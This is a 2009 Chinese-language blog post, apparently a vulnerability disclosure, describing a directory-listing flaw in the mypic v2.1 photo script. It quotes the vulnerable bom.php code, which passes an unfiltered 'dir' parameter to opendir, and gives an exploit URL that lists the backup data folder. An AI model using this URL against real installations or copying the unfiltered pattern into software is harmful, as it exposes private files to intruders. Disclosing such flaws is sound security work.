查看文章
 
mypic v2.1遍历文件漏洞
2009年03月24日 星期二 19:13

漏洞作者:幻泉[B.S.N]

官方网站: http://www.diqiye.com/mypic/

漏洞说明:
/bom.php (文件没做任何访问限制)
  
Code:
if (isset($_GET['dir'])){ //config the basedir
     $basedir=$_GET['dir'];//这个没做过滤可以输入任何目录
}else{
     $basedir = '.';
}

$auto = 1;

checkdir($basedir);

function checkdir($basedir){
     if ($dh = opendir($basedir)) {
         while (($file = readdir($dh)) !== false) {
             if ($file != '.' && $file != '..'){
                 if (!is_dir($basedir."/".$file)) {
                     echo "filename: $basedir/

$file ".checkBOM("$basedir/$file")." <br>";
                 }else{
                     $dirname = $basedir."/".

$file;
                     checkdir($dirname);
                 }
             }
         }
     closedir($dh);
     }
}
......
function rewrite ($filename, $data) {
     $filenum = fopen($filename, "w");
     flock($filenum, LOCK_EX);
     fwrite($filenum, $data);
     fclose($filenum);
}

利用
http://127.0.0.1/mypic1/bom.php?dir=./data/bak/


类别:漏洞新闻||添加到搜藏 |分享到i贴吧|浏览(616)|评论 (0)
 
最近读者:
 
网友评论:
发表评论:
姓 名:
网址或邮箱: (选填)
内 容:
     

   
帮助中心 | 空间客服 | 投诉中心 | 空间协议
©2012 Baidu